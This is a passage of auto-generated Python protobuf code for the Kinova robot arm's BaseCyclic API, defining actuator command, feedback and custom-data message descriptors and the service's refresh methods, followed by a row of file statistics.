options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_2', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_2', index=3,
number=4, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_3', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_3', index=4,
number=5, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_4', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_4', index=5,
number=6, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_5', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_5', index=6,
number=7, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_6', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_6', index=7,
number=8, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_7', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_7', index=8,
number=9, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_8', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_8', index=9,
number=10, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_9', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_9', index=10,
number=11, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_10', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_10', index=11,
number=12, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_11', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_11', index=12,
number=13, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_12', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_12', index=13,
number=14, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_13', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_13', index=14,
number=15, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_14', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_14', index=15,
number=16, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_15', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_15', index=16,
number=17, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=548,
serialized_end=962,
)
_BASEFEEDBACK = _descriptor.Descriptor(
name='BaseFeedback',
full_name='Kinova.Api.BaseCyclic.BaseFeedback',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='active_state_connection_identifier', full_name='Kinova.Api.BaseCyclic.BaseFeedback.active_state_connection_identifier', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='active_state', full_name='Kinova.Api.BaseCyclic.BaseFeedback.active_state', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='arm_voltage', full_name='Kinova.Api.BaseCyclic.BaseFeedback.arm_voltage', index=2,
number=3, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='arm_current', full_name='Kinova.Api.BaseCyclic.BaseFeedback.arm_current', index=3,
number=4, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='temperature_cpu', full_name='Kinova.Api.BaseCyclic.BaseFeedback.temperature_cpu', index=4,
number=5, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='temperature_ambient', full_name='Kinova.Api.BaseCyclic.BaseFeedback.temperature_ambient', index=5,
number=6, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='imu_acceleration_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.imu_acceleration_x', index=6,
number=7, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='imu_acceleration_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.imu_acceleration_y', index=7,
number=8, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='imu_acceleration_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.imu_acceleration_z', index=8,
number=9, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='imu_angular_velocity_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.imu_angular_velocity_x', index=9,
number=10, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='imu_angular_velocity_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.imu_angular_velocity_y', index=10,
number=11, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='imu_angular_velocity_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.imu_angular_velocity_z', index=11,
number=12, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_pose_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_pose_x', index=12,
number=13, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_pose_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_pose_y', index=13,
number=14, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_pose_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_pose_z', index=14,
number=15, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_pose_theta_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_pose_theta_x', index=15,
number=16, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_pose_theta_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_pose_theta_y', index=16,
number=17, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_pose_theta_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_pose_theta_z', index=17,
number=18, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_twist_linear_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_twist_linear_x', index=18,
number=19, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_twist_linear_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_twist_linear_y', index=19,
number=20, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_twist_linear_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_twist_linear_z', index=20,
number=21, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_twist_angular_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_twist_angular_x', index=21,
number=22, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_twist_angular_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_twist_angular_y', index=22,
number=23, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_twist_angular_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_twist_angular_z', index=23,
number=24, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_external_wrench_force_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_external_wrench_force_x', index=24,
number=25, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_external_wrench_force_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_external_wrench_force_y', index=25,
number=26, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_external_wrench_force_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_external_wrench_force_z', index=26,
number=27, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_external_wrench_torque_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_external_wrench_torque_x', index=27,
number=28, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_external_wrench_torque_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_external_wrench_torque_y', index=28,
number=29, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_external_wrench_torque_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_external_wrench_torque_z', index=29,
number=30, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='fault_bank_a', full_name='Kinova.Api.BaseCyclic.BaseFeedback.fault_bank_a', index=30,
number=31, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='fault_bank_b', full_name='Kinova.Api.BaseCyclic.BaseFeedback.fault_bank_b', index=31,
number=32, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='warning_bank_a', full_name='Kinova.Api.BaseCyclic.BaseFeedback.warning_bank_a', index=32,
number=33, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='warning_bank_b', full_name='Kinova.Api.BaseCyclic.BaseFeedback.warning_bank_b', index=33,
number=34, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='commanded_tool_pose_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.commanded_tool_pose_x', index=34,
number=35, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='commanded_tool_pose_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.commanded_tool_pose_y', index=35,
number=36, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='commanded_tool_pose_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.commanded_tool_pose_z', index=36,
number=37, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='commanded_tool_pose_theta_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.commanded_tool_pose_theta_x', index=37,
number=38, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='commanded_tool_pose_theta_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.commanded_tool_pose_theta_y', index=38,
number=39, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='commanded_tool_pose_theta_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.commanded_tool_pose_theta_z', index=39,
number=40, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=965,
serialized_end=2198,
)
_CUSTOMDATA = _descriptor.Descriptor(
name='CustomData',
full_name='Kinova.Api.BaseCyclic.CustomData',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='frame_id', full_name='Kinova.Api.BaseCyclic.CustomData.frame_id', index=0,
number=1, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_0', full_name='Kinova.Api.BaseCyclic.CustomData.custom_data_0', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_1', full_name='Kinova.Api.BaseCyclic.CustomData.custom_data_1', index=2,
number=3, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_2', full_name='Kinova.Api.BaseCyclic.CustomData.custom_data_2', index=3,
number=4, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_3', full_name='Kinova.Api.BaseCyclic.CustomData.custom_data_3', index=4,
number=5, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_4', full_name='Kinova.Api.BaseCyclic.CustomData.custom_data_4', index=5,
number=6, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_5', full_name='Kinova.Api.BaseCyclic.CustomData.custom_data_5', index=6,
number=7, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_6', full_name='Kinova.Api.BaseCyclic.CustomData.custom_data_6', index=7,
number=8, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_7', full_name='Kinova.Api.BaseCyclic.CustomData.custom_data_7', index=8,
number=9, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='actuators_custom_data', full_name='Kinova.Api.BaseCyclic.CustomData.actuators_custom_data', index=9,
number=10, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='interconnect_custom_data', full_name='Kinova.Api.BaseCyclic.CustomData.interconnect_custom_data', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2201,
serialized_end=2566,
)
_COMMAND = _descriptor.Descriptor(
name='Command',
full_name='Kinova.Api.BaseCyclic.Command',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='frame_id', full_name='Kinova.Api.BaseCyclic.Command.frame_id', index=0,
number=1, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='actuators', full_name='Kinova.Api.BaseCyclic.Command.actuators', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='interconnect', full_name='Kinova.Api.BaseCyclic.Command.interconnect', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2569,
serialized_end=2717,
)
_FEEDBACK = _descriptor.Descriptor(
name='Feedback',
full_name='Kinova.Api.BaseCyclic.Feedback',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='frame_id', full_name='Kinova.Api.BaseCyclic.Feedback.frame_id', index=0,
number=1, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='base', full_name='Kinova.Api.BaseCyclic.Feedback.base', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='actuators', full_name='Kinova.Api.BaseCyclic.Feedback.actuators', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='interconnect', full_name='Kinova.Api.BaseCyclic.Feedback.interconnect', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2720,
serialized_end=2922,
)
_BASEFEEDBACK.fields_by_name['active_state'].enum_type = Common__pb2._ARMSTATE
_CUSTOMDATA.fields_by_name['actuators_custom_data'].message_type = _ACTUATORCUSTOMDATA
_CUSTOMDATA.fields_by_name['interconnect_custom_data'].message_type = InterconnectCyclicMessage__pb2._CUSTOMDATA
_COMMAND.fields_by_name['actuators'].message_type = _ACTUATORCOMMAND
_COMMAND.fields_by_name['interconnect'].message_type = InterconnectCyclicMessage__pb2._COMMAND
_FEEDBACK.fields_by_name['base'].message_type = _BASEFEEDBACK
_FEEDBACK.fields_by_name['actuators'].message_type = _ACTUATORFEEDBACK
_FEEDBACK.fields_by_name['interconnect'].message_type = InterconnectCyclicMessage__pb2._FEEDBACK
DESCRIPTOR.message_types_by_name['ActuatorCommand'] = _ACTUATORCOMMAND
DESCRIPTOR.message_types_by_name['ActuatorFeedback'] = _ACTUATORFEEDBACK
DESCRIPTOR.message_types_by_name['ActuatorCustomData'] = _ACTUATORCUSTOMDATA
DESCRIPTOR.message_types_by_name['BaseFeedback'] = _BASEFEEDBACK
DESCRIPTOR.message_types_by_name['CustomData'] = _CUSTOMDATA
DESCRIPTOR.message_types_by_name['Command'] = _COMMAND
DESCRIPTOR.message_types_by_name['Feedback'] = _FEEDBACK
DESCRIPTOR.enum_types_by_name['ServiceVersion'] = _SERVICEVERSION
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ActuatorCommand = _reflection.GeneratedProtocolMessageType('ActuatorCommand', (_message.Message,), dict(
DESCRIPTOR = _ACTUATORCOMMAND,
__module__ = 'BaseCyclic_pb2'
# @@protoc_insertion_point(class_scope:Kinova.Api.BaseCyclic.ActuatorCommand)
))
_sym_db.RegisterMessage(ActuatorCommand)
ActuatorFeedback = _reflection.GeneratedProtocolMessageType('ActuatorFeedback', (_message.Message,), dict(
DESCRIPTOR = _ACTUATORFEEDBACK,
__module__ = 'BaseCyclic_pb2'
# @@protoc_insertion_point(class_scope:Kinova.Api.BaseCyclic.ActuatorFeedback)
))
_sym_db.RegisterMessage(ActuatorFeedback)
ActuatorCustomData = _reflection.GeneratedProtocolMessageType('ActuatorCustomData', (_message.Message,), dict(
DESCRIPTOR = _ACTUATORCUSTOMDATA,
__module__ = 'BaseCyclic_pb2'
# @@protoc_insertion_point(class_scope:Kinova.Api.BaseCyclic.ActuatorCustomData)
))
_sym_db.RegisterMessage(ActuatorCustomData)
BaseFeedback = _reflection.GeneratedProtocolMessageType('BaseFeedback', (_message.Message,), dict(
DESCRIPTOR = _BASEFEEDBACK,
__module__ = 'BaseCyclic_pb2'
# @@protoc_insertion_point(class_scope:Kinova.Api.BaseCyclic.BaseFeedback)
))
_sym_db.RegisterMessage(BaseFeedback)
CustomData = _reflection.GeneratedProtocolMessageType('CustomData', (_message.Message,), dict(
DESCRIPTOR = _CUSTOMDATA,
__module__ = 'BaseCyclic_pb2'
# @@protoc_insertion_point(class_scope:Kinova.Api.BaseCyclic.CustomData)
))
_sym_db.RegisterMessage(CustomData)
Command = _reflection.GeneratedProtocolMessageType('Command', (_message.Message,), dict(
DESCRIPTOR = _COMMAND,
__module__ = 'BaseCyclic_pb2'
# @@protoc_insertion_point(class_scope:Kinova.Api.BaseCyclic.Command)
))
_sym_db.RegisterMessage(Command)
Feedback = _reflection.GeneratedProtocolMessageType('Feedback', (_message.Message,), dict(
DESCRIPTOR = _FEEDBACK,
__module__ = 'BaseCyclic_pb2'
# @@protoc_insertion_point(class_scope:Kinova.Api.BaseCyclic.Feedback)
))
_sym_db.RegisterMessage(Feedback)
_BASECYCLIC = _descriptor.ServiceDescriptor(
name='BaseCyclic',
full_name='Kinova.Api.BaseCyclic.BaseCyclic',
file=DESCRIPTOR,
index=0,
options=None,
serialized_start=2980,
serialized_end=3313,
methods=[
_descriptor.MethodDescriptor(
name='Refresh',
full_name='Kinova.Api.BaseCyclic.BaseCyclic.Refresh',
index=0,
containing_service=None,
input_type=_COMMAND,
output_type=_FEEDBACK,
options=None,
),
_descriptor.MethodDescriptor(
name='RefreshCommand',
full_name='Kinova.Api.BaseCyclic.BaseCyclic.RefreshCommand',
index=1,
containing_service=None,
input_type=_COMMAND,
output_type=Common__pb2._EMPTY,
options=None,
),
_descriptor.MethodDescriptor(
name='RefreshFeedback',
full_name='Kinova.Api.BaseCyclic.BaseCyclic.RefreshFeedback',
index=2,
containing_service=None,
input_type=Common__pb2._EMPTY,
output_type=_FEEDBACK,
options=None,
),
_descriptor.MethodDescriptor(
name='RefreshCustomData',
full_name='Kinova.Api.BaseCyclic.BaseCyclic.RefreshCustomData',
index=3,
containing_service=None,
input_type=_CUSTOMDATA,
output_type=_CUSTOMDATA,
options=None,
),
])
_sym_db.RegisterServiceDescriptor(_BASECYCLIC)
DESCRIPTOR.services_by_name['BaseCyclic'] = _BASECYCLIC
# @@protoc_insertion_point(module_scope)
| 50.567383
| 5,696
| 0.749522
| 7,082
| 51,781
| 5.201356
| 0.048009
| 0.064068
| 0.064991
| 0.049843
| 0.845342
| 0.817407
| 0.778695
| 0.754832
| 0.69052
| 0.668504
| 0
| 0.049562
| 0.128348
| 51,781
| 1,023
| 5,697
| 50.616813
| 0.766567
| 0.012881
| 0
| 0.716189
| 1
| 0.003074
| 0.236801
| 0.203515
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.01127
| 0
| 0.01127
| 0
| 0
| 0
| 0
